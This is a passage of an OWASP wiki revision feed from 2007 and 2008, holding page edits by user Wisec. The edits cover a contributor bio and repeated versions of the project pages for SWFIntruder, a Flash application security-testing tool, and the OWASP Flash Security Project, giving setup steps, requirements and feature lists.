! width=&amp;quot;600&amp;quot; height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | Application&lt;br /&gt;
! width=&amp;quot;220&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Author'''&lt;br /&gt;
! width=&amp;quot;60&amp;quot; align=&amp;quot;CENTER&amp;quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''1st&amp;lt;br&amp;gt;Reviewer'''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''2nd&amp;lt;br&amp;gt;Reviewer '''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''OWASP&amp;lt;br&amp;gt;Board&amp;lt;br&amp;gt;Reviewer&lt;br /&gt;
'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Book Cover &amp;amp; Sleeve Design|OWASP Book Cover &amp;amp; Sleeve Design]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | LXstudios,&amp;lt;br&amp;gt;[mailto:deb@lxstudios.com Deb Brewer] &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:yiannis@owasp.org Yiannis Pavlosoglou]&amp;lt;br&amp;gt;[[OWASP NYC AppSec 2008 Conference-SPEAKER-Yiannis Pavlosoglou|Short Bio]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Dinis Cruz&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Individual and Corporate Member Packs plus Conference Attendee Packs Brief|OWASP Individual &amp;amp; Corporate Member Packs, Conference Attendee Packs Brief]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | LXstudios,&amp;lt;br&amp;gt;[mailto:deb@lxstudios.com Deb Brewer] &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:yiannis@owasp.org Yiannis Pavlosoglou]&amp;lt;br&amp;gt;[[OWASP NYC AppSec 2008 Conference-SPEAKER-Yiannis Pavlosoglou|Short Bio]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Dinis Cruz&lt;br /&gt;
|-&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Wisec&amp;diff=33431</id>
		<title>User:Wisec</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Wisec&amp;diff=33431"/>
				<updated>2008-07-04T16:24:29Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Stefano Di Paola is the CTO and a cofounder of [http://www.mindedsecurity.com Minded Security], where he is responsible for Research and Development Lab. &lt;br /&gt;
&lt;br /&gt;
Prior to founding Minded Security, Stefano was a freelance security consultant, working for several private and public companies. He also worked in collaboration with University of Florence at the Faculty of Computer Engineering.&lt;br /&gt;
&lt;br /&gt;
In the past years he released several advisories including the ones that are not publicly disclosed but patched and several open source tools.&lt;br /&gt;
&lt;br /&gt;
He's the lead of  [[:Category:SWFIntruder|SWFIntruder]] project hosted @ owasp.org. &lt;br /&gt;
&lt;br /&gt;
He has also contributed to OWASP testing guide and is also the Research &amp;amp; Development Director of OWASP Italian Chapter. Stefano has participated to several international talk as speaker @ 23rd CCC,Owasp Appsec2k7 S.Jose, Google Tech Talk and others.&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Wisec&amp;diff=33430</id>
		<title>User:Wisec</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Wisec&amp;diff=33430"/>
				<updated>2008-07-04T16:20:59Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: New page: Stefano Di Paola is the CTO and a cofounder of [http://www.mindedsecurity.com Minded Security], where he is responsible for Research and Development Lab.   Prior to founding Minded Securit...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Stefano Di Paola is the CTO and a cofounder of [http://www.mindedsecurity.com Minded Security], where he is responsible for Research and Development Lab. &lt;br /&gt;
&lt;br /&gt;
Prior to founding Minded Security, Stefano was a freelance security consultant, working for several private and public companies. He also worked in collaboration with University of Florence at the Faculty of Computer Engineering.&lt;br /&gt;
&lt;br /&gt;
In the past years he released several advisories including the ones that are not publicly disclosed but patched and several open source tools.&lt;br /&gt;
&lt;br /&gt;
He's the lead of  [https://www.owasp.org/index.php/Category:SWFIntruder SWFIntruder] project hosted @ owasp.org. &lt;br /&gt;
&lt;br /&gt;
He has also contributed to OWASP testing guide and is also the Research &amp;amp; Development Director of OWASP Italian Chapter. Stefano has participated to several international talk as speaker @ 23rd CCC,Owasp Appsec2k7 S.Jose, Google Tech Talk and others.&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:SWFIntruder&amp;diff=23886</id>
		<title>Category:SWFIntruder</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:SWFIntruder&amp;diff=23886"/>
				<updated>2007-12-06T17:27:03Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Added Known Issues and a note.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== SWF Intruder Overview ==&lt;br /&gt;
&lt;br /&gt;
[[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]&lt;br /&gt;
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically &lt;br /&gt;
developed for analyzing and testing security of Flash applications at runtime.&lt;br /&gt;
It helps to find flaws in Flash applications using the methodology originally &lt;br /&gt;
described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in &lt;br /&gt;
[http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in&lt;br /&gt;
a tool taking advantage of the best features of those technologies in order to&lt;br /&gt;
get the best capabilities for analysis and interaction with the testing Flash movies.&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed by using only open source software.&lt;br /&gt;
Thanks to its generality, SWFIntruder is OS independant.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
SWFIntruder purpose is to analyze a Flash application for version =&amp;lt; 8 and to &lt;br /&gt;
help check in a semi automated fashion the presence of security issues like&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing.&lt;br /&gt;
&lt;br /&gt;
Moreover does help raise awareness around the subject of flash &lt;br /&gt;
applications security and how that can be used to and assist in the &lt;br /&gt;
security of applications. &lt;br /&gt;
&lt;br /&gt;
== QuickStart ==&lt;br /&gt;
&lt;br /&gt;
Tested on win32 and a few linux flavors. &lt;br /&gt;
Current version is 0.9.&lt;br /&gt;
Get it from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
=== Latest Features ===&lt;br /&gt;
&lt;br /&gt;
Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.&lt;br /&gt;
&lt;br /&gt;
=== Video Tutorial ===&lt;br /&gt;
&lt;br /&gt;
Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.&lt;br /&gt;
&lt;br /&gt;
=== Download ===&lt;br /&gt;
&lt;br /&gt;
You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
   1. Firefox 2.x [Needed]&lt;br /&gt;
   2. FireBug Addon [Suggested]&lt;br /&gt;
   3. Flash Player Plugin Ver &amp;gt;= 9 [Needed]&lt;br /&gt;
   4. Any Web Server [Needed]&lt;br /&gt;
   5. Any OS [Needed :&amp;gt; ]&lt;br /&gt;
&lt;br /&gt;
== Quick and Dirty Tutorial ==&lt;br /&gt;
&lt;br /&gt;
* Download SWFIntruder latest version from Google Code.&lt;br /&gt;
* Uncompress it and save it somewhere in your webserver root directory.&lt;br /&gt;
* Browse to http://YourHost/swfintruderDir/.&lt;br /&gt;
 '''Note''': Don't use '''[[localhost]]''' because Firefox will throw an exception. &lt;br /&gt;
 better use 127.0.0.1 or 'your.FQDN.ltd'&lt;br /&gt;
* Use test.swf (a simple flawed swf movie) by filling the &amp;quot;Flash Movie Form&amp;quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).&lt;br /&gt;
* Fill the &amp;quot;Flash Movie&amp;quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &amp;quot;Load&amp;quot;.&lt;br /&gt;
* Wait 1 second for the test movie to be loaded.&lt;br /&gt;
* Enjoy browsing the objects.&lt;br /&gt;
* Test undefined variables by selecting some of them in the &amp;quot;Undefined Variables&amp;quot; and click 'start' on the Xss window.&lt;br /&gt;
* Wait for the test to be finished.&lt;br /&gt;
* If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Features and Screenshots ==&lt;br /&gt;
&lt;br /&gt;
* Basic predefined attack patterns.&lt;br /&gt;
* Highly customizable attacks.&lt;br /&gt;
* Highly customizable undefined variables.&lt;br /&gt;
* Semi automated Xss check.&lt;br /&gt;
* User configurable internal parameters.&lt;br /&gt;
* Log Window for debugging and tracking.&lt;br /&gt;
* History of latest 5 tested SWF files.&lt;br /&gt;
* ActionScript Objects runtime explorer in tree view.&lt;br /&gt;
* Persistent Configuration and Layout.&lt;br /&gt;
&lt;br /&gt;
== Known Issues/Bugs ==&lt;br /&gt;
&lt;br /&gt;
* You could get an error like the following:&lt;br /&gt;
*: '''Error: uncaught exception: [Exception... &amp;quot;Security error&amp;quot;  code: &amp;quot;1000&amp;quot;'''&lt;br /&gt;
*: '''nsresult: &amp;quot;0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)&amp;quot;  location:'''&lt;br /&gt;
*: '''&amp;quot;http://localhost/swfintruder/js/globalStorage.js Line: 12&amp;quot;]'''&lt;br /&gt;
*:Try using the following [http://code.google.com/p/swfintruder/issues/detail?id=1 solutions].&lt;br /&gt;
* Sometime Firefox crashes. This is due to some problem in Firefox and not in SWF Intruder itself.&lt;br /&gt;
* If you use SWF Intruder under linux, the flash plugin eats a lot of memory.&lt;br /&gt;
* There's a pattern for which __resolve does not work:&lt;br /&gt;
&lt;br /&gt;
    frame 1 {&lt;br /&gt;
      static.main(this)&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
*:where 'this' is _root but not explicitly set.&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The SWF Intruder project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:SWFIntruder&amp;diff=23823</id>
		<title>Category:SWFIntruder</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:SWFIntruder&amp;diff=23823"/>
				<updated>2007-12-03T18:08:19Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* SWF Intruder Overview */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== SWF Intruder Overview ==&lt;br /&gt;
&lt;br /&gt;
[[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]&lt;br /&gt;
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically &lt;br /&gt;
developed for analyzing and testing security of Flash applications at runtime.&lt;br /&gt;
It helps to find flaws in Flash applications using the methodology originally &lt;br /&gt;
described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in &lt;br /&gt;
[http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in&lt;br /&gt;
a tool taking advantage of the best features of those technologies in order to&lt;br /&gt;
get the best capabilities for analysis and interaction with the testing Flash movies.&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed by using only open source software.&lt;br /&gt;
Thanks to its generality, SWFIntruder is OS independant.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
SWFIntruder purpose is to analyze a Flash application for version =&amp;lt; 8 and to &lt;br /&gt;
help check in a semi automated fashion the presence of security issues like&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing.&lt;br /&gt;
&lt;br /&gt;
Moreover does help raise awareness around the subject of flash &lt;br /&gt;
applications security and how that can be used to and assist in the &lt;br /&gt;
security of applications. &lt;br /&gt;
&lt;br /&gt;
== QuickStart ==&lt;br /&gt;
&lt;br /&gt;
Tested on win32 and a few linux flavors. &lt;br /&gt;
Current version is 0.9.&lt;br /&gt;
Get it from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
=== Latest Features ===&lt;br /&gt;
&lt;br /&gt;
Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.&lt;br /&gt;
&lt;br /&gt;
=== Video Tutorial ===&lt;br /&gt;
&lt;br /&gt;
Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.&lt;br /&gt;
&lt;br /&gt;
=== Download ===&lt;br /&gt;
&lt;br /&gt;
You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
   1. Firefox 2.x [Needed]&lt;br /&gt;
   2. FireBug Addon [Suggested]&lt;br /&gt;
   3. Flash Player Plugin Ver &amp;gt;= 9 [Needed]&lt;br /&gt;
   4. Any Web Server [Needed]&lt;br /&gt;
   5. Any OS [Needed :&amp;gt; ]&lt;br /&gt;
&lt;br /&gt;
== Quick and Dirty Tutorial ==&lt;br /&gt;
&lt;br /&gt;
* Download SWFIntruder latest version from Google Code.&lt;br /&gt;
* Uncompress it and save it somewhere in your webserver root directory.&lt;br /&gt;
* Browse to http://YourHost/swfintruderDir/.&lt;br /&gt;
* Use test.swf (a simple flawed swf movie) by filling the &amp;quot;Flash Movie Form&amp;quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).&lt;br /&gt;
* Fill the &amp;quot;Flash Movie&amp;quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &amp;quot;Load&amp;quot;.&lt;br /&gt;
* Wait 1 second for the test movie to be loaded.&lt;br /&gt;
* Enjoy browsing the objects.&lt;br /&gt;
* Test undefined variables by selecting some of them in the &amp;quot;Undefined Variables&amp;quot; and click 'start' on the Xss window.&lt;br /&gt;
* Wait for the test to be finished.&lt;br /&gt;
* If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Features and Screenshots ==&lt;br /&gt;
&lt;br /&gt;
* Basic predefined attack patterns.&lt;br /&gt;
* Highly customizable attacks.&lt;br /&gt;
* Highly customizable undefined variables.&lt;br /&gt;
* Semi automated Xss check.&lt;br /&gt;
* User configurable internal parameters.&lt;br /&gt;
* Log Window for debugging and tracking.&lt;br /&gt;
* History of latest 5 tested SWF files.&lt;br /&gt;
* ActionScript Objects runtime explorer in tree view.&lt;br /&gt;
* Persistent Configuration and Layout.&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The SWF Intruder project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23822</id>
		<title>Category:OWASP Flash Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23822"/>
				<updated>2007-12-03T18:07:16Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
&lt;br /&gt;
OWASP Flash Security Project is an open project for sharing a knowledge base in order to raise awareness around the subject of Flash applications security.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
Flash security testing [https://www.owasp.org/index.php/Category:SWFIntruder SWFIntruder]&lt;br /&gt;
&lt;br /&gt;
== White Papers ==&lt;br /&gt;
&lt;br /&gt;
[1] '''Testing Flash Applications''' [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007/Agenda Owasp Appsec 2007], 17th May 2007, Milan (Italy).&lt;br /&gt;
&lt;br /&gt;
[2] '''Finding Vulnerabilities in Flash Applications''' [http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda Owasp Appsec 2007], 15th November 2007, San Jose CA (USA)&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Tool]]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23820</id>
		<title>Category:OWASP Flash Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23820"/>
				<updated>2007-12-03T13:43:48Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
&lt;br /&gt;
OWASP Flash Security Project is an open project for sharing a knowledge base in order to raise awareness around the subject of Flash applications security.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
Flash security testing [https://www.owasp.org/index.php/Category:SWFIntruder SWFIntruder]&lt;br /&gt;
&lt;br /&gt;
== White Papers ==&lt;br /&gt;
&lt;br /&gt;
[1] '''Testing Flash Applications''' [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007/Agenda Owasp Appsec 2007], 17th May 2007, Milan (Italy).&lt;br /&gt;
&lt;br /&gt;
[2] '''Finding Vulnerabilities in Flash Applications''' [http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda Owasp Appsec 2007], 15th November 2007, San Jose CA (USA)&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]&lt;br /&gt;
[[Category:OWASP Download]]&lt;br /&gt;
[[Category:OWASP Tool]]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:SWFIntruder&amp;diff=23819</id>
		<title>Category:SWFIntruder</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:SWFIntruder&amp;diff=23819"/>
				<updated>2007-12-03T13:27:53Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: New page: == SWF Intruder Overview ==  SWFIntruder in action SWFIntruder (pronounced Swiff Intruder) is the first tool specifically  developed fo...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== SWF Intruder Overview ==&lt;br /&gt;
&lt;br /&gt;
[[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]&lt;br /&gt;
SWFIntruder (pronounced Swiff Intruder) is the first tool specifically &lt;br /&gt;
developed for analyzing and testing security of Flash applications at runtime.&lt;br /&gt;
It helps to find flaws in Flash applications using the methodology originally &lt;br /&gt;
described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in &lt;br /&gt;
[http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in&lt;br /&gt;
a tool taking advantage of the best features of those technologies in order to&lt;br /&gt;
get the best capabilities for analysis and interaction with the testing Flash movies.&lt;br /&gt;
&lt;br /&gt;
SWFIntruder was developed by using only open source software.&lt;br /&gt;
Thanks to its generality, SWFIntruder is OS independant.&lt;br /&gt;
&lt;br /&gt;
== Goals ==&lt;br /&gt;
&lt;br /&gt;
SWFIntruder purpose is to analyze a Flash application for version =&amp;lt; 8 and to &lt;br /&gt;
help check in a semi automated fashion the presence of security issues like&lt;br /&gt;
Cross Site Scripting and Cross Site Flashing.&lt;br /&gt;
&lt;br /&gt;
Moreover does help raise awareness around the subject of flash &lt;br /&gt;
applications security and how that can be used to and assist in the &lt;br /&gt;
security of applications. &lt;br /&gt;
&lt;br /&gt;
== QuickStart ==&lt;br /&gt;
&lt;br /&gt;
Tested on win32 and a few linux flavors. &lt;br /&gt;
Current version is 0.9.&lt;br /&gt;
Get it from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
=== Latest Features ===&lt;br /&gt;
&lt;br /&gt;
Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.&lt;br /&gt;
&lt;br /&gt;
=== Video Tutorial ===&lt;br /&gt;
&lt;br /&gt;
Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.&lt;br /&gt;
&lt;br /&gt;
=== Download ===&lt;br /&gt;
&lt;br /&gt;
You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
   1. Firefox 2.x [Needed]&lt;br /&gt;
   2. FireBug Addon [Suggested]&lt;br /&gt;
   3. Flash Player Plugin Ver &amp;gt;= 9 [Needed]&lt;br /&gt;
   4. Any Web Server [Needed]&lt;br /&gt;
   5. Any OS [Needed :&amp;gt; ]&lt;br /&gt;
&lt;br /&gt;
== Quick and Dirty Tutorial ==&lt;br /&gt;
&lt;br /&gt;
* Download SWFIntruder latest version from Google Code.&lt;br /&gt;
* Uncompress it and save it somewhere in your webserver root directory.&lt;br /&gt;
* Browse to http://YourHost/swfintruderDir/.&lt;br /&gt;
* Use test.swf (a simple flawed swf movie) by filling the &amp;quot;Flash Movie Form&amp;quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).&lt;br /&gt;
* Fill the &amp;quot;Flash Movie&amp;quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &amp;quot;Load&amp;quot;.&lt;br /&gt;
* Wait 1 second for the test movie to be loaded.&lt;br /&gt;
* Enjoy browsing the objects.&lt;br /&gt;
* Test undefined variables by selecting some of them in the &amp;quot;Undefined Variables&amp;quot; and click 'start' on the Xss window.&lt;br /&gt;
* Wait for the test to be finished.&lt;br /&gt;
* If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Features and Screenshots ==&lt;br /&gt;
&lt;br /&gt;
* Basic predefined attack patterns.&lt;br /&gt;
* Highly customizable attacks.&lt;br /&gt;
* Highly customizable undefined variables.&lt;br /&gt;
* Semi automated Xss check.&lt;br /&gt;
* User configurable internal parameters.&lt;br /&gt;
* Log Window for debugging and tracking.&lt;br /&gt;
* History of latest 5 tested SWF files.&lt;br /&gt;
* ActionScript Objects runtime explorer in tree view.&lt;br /&gt;
* Persistent Configuration and Layout.&lt;br /&gt;
&lt;br /&gt;
== Project Contributors ==&lt;br /&gt;
&lt;br /&gt;
The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''.  &lt;br /&gt;
&lt;br /&gt;
SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The SWF Intruder project is sponsored by &lt;br /&gt;
[http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23818</id>
		<title>Category:OWASP Flash Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&amp;diff=23818"/>
				<updated>2007-12-03T13:12:12Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security&lt;br /&gt;
&lt;br /&gt;
'''SWFIntruder''' is a tool developed by Stefano Di Paola and maintained by  [http://www.owasp.org OWASP] designed to perform a security analysis of Flash applications. &lt;br /&gt;
&lt;br /&gt;
== SWF Intruder Overview ==&lt;br /&gt;
&lt;br /&gt;
